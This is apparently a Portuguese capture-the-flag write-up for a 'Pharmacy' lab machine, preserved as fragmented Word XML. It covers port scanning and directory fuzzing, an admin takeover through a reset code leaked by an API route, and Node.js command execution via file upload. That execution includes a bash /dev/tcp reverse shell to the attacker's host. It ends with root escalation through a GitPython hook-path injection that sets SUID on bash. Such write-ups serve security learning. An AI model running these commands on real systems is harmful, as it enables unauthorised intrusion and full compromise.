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Pharmacy.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utilizado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quais portas estavam abertas na máquina alvo.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-sVC &lt;MACHINE-IP&gt;-vvv -oN nmap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60700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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um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exposto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3000/TCP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 Ao acessar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3000/TCP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a aplicação web exposta. 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da aplicação, foi realizado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objetivo de identificar arquivos e diretórios expostos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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'http://&lt;MACHINE-IP&gt;:3000/FUZZ'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 onelistforallmicro.txt -c -t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//github.com/six2dez/OneListForAll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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9656"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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65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61500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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o processo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rota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/users/1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por retornar informações detalhadas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análise da aplicação, foi identificada a rota de login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qual possuía uma funcionalidade de recuperação de senha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(“Forgot Password”)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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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já havia sido identificado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e-mail válido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administrador, foi possível solicitar a redefinição de senha da conta administrativa por meio da funcionalidade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“Forgot Password”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admin@pharmacy.hc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33700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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novamente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/users/1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observado que o campo referente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OTP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anteriormente estava com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passando posteriormente a refletir o código de redefinição de senha nas informações do usuário. </w:t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realizar a redefinição da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38500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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icje7kja4qlx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E, com isso, foi possível obter acesso ao painel administrativo do sistema. </w:t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97100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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aplicação, foi identificada uma funcionalidade de upload de arquivos que permitia o envio de extensões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pdf, doc, docx e xls.</w:t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interceptar a requisição utilizando um proxy, foi identificado um erro no processo de upload, mesmo ao enviar um arquivo no formato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.pdf. </w:t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WhatWeb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que a aplicação web foi desenvolvida na linguagem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o ambiente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Node.js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conjunto com o framework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Express.</w:t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whatweb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//&lt;MACHINE-IP&gt;:3000/upload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2900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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base nas tecnologias identificadas, foi realizada uma tentativa de upload de um arquivo com extensão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 aplicação.  Para verificar a possibilidade de execução de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NodeJs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aplicação, foi utilizado o módulo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child_process,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pela execução de comandos no sistema operacional. </w:t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 = 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'child_process'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child.execSync(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'curl &lt;VPN-IP&gt;'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22500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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requisição enviada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identificada em nossa máquina, confirmando que a execução de comandos no sistema operacional ocorreu com sucesso. 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4500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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tornou-se possível executar uma reverse shell no sistema comprometido. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 = 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'child_process'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child.execSync(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 -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1"'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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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recebida uma conexão reversa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nc -lnvp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443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 acesso inicial, foi realizada a estabilização da shell para um ambiente TTY interativo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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 /dev/null -c bash</w:t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ctr+z</w:t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stty raw -echo;fg</w:t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19200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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usuário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/home/node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17700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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ksdorpr8i96n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executar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que o usuário possui permissão para executar o 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/opt/deploy.py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-l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25400" l="25400" r="25400" t="254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/opt/deploy.py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identificadas diversas bibliotecas utilizadas pela aplicação, incluindo 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Foi observado que a versão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3.1.44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uma vulnerabilidade conhecida. Essa vulnerabilidade permite que um atacante injete opções ocultas (como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--config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dentro de uma string que parece segura, burlando a validação de segurança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Com isso, ele consegue apontar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para hooks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maliciosos que são executados automaticamente durante o clone. O resultado é a execução remota de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(RCE) na máquina da vítima.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https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-x2qx-6953-8485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 list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1470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criado um diretório controlado pelo atacante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/tmp/hooks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contendo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hook malicioso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post-checkout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Esse hook foi configurado para executar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chmod u+s /bin/bash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adicionando o bit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/bin/bash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durante a operação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checkout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repositório.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/opt/deploy.py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executado com privilégios elevados, utilizando o parâmetro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--config core.hooksPath=/tmp/hooks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que permitiu redefinir o caminho padrão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hooks do Git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o diretório malicioso controlado pelo atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 -p /tmp/hooks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&gt; /tmp/hooks/post-checkout &lt;&lt; EOF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 u+s /bin/bash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 +x /tmp/hooks/post-checkout </w:t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/usr/bin/python3 /opt/deploy.py /opt/repos/staging main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"--single-branch --config core.hooksPath=/tmp/hooks"</w:t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-p</w:t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38300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 encontra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headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37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7" name="image27.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image27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F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4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Pharmacy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9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml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19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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jpg"/><Relationship Id="rId2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GlSdjJT9sIXyXChRXbADMpx4Q==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguaWNqZTdramE0cWx4Mg5oLmtzZG9ycHI4aTk2bjIOaC42dnJvZ29ybTM2cTk4AHIhMWJjTjlDSWtnTldtSUxQRUZLdE9CbTJKdDE2UUItZXlJ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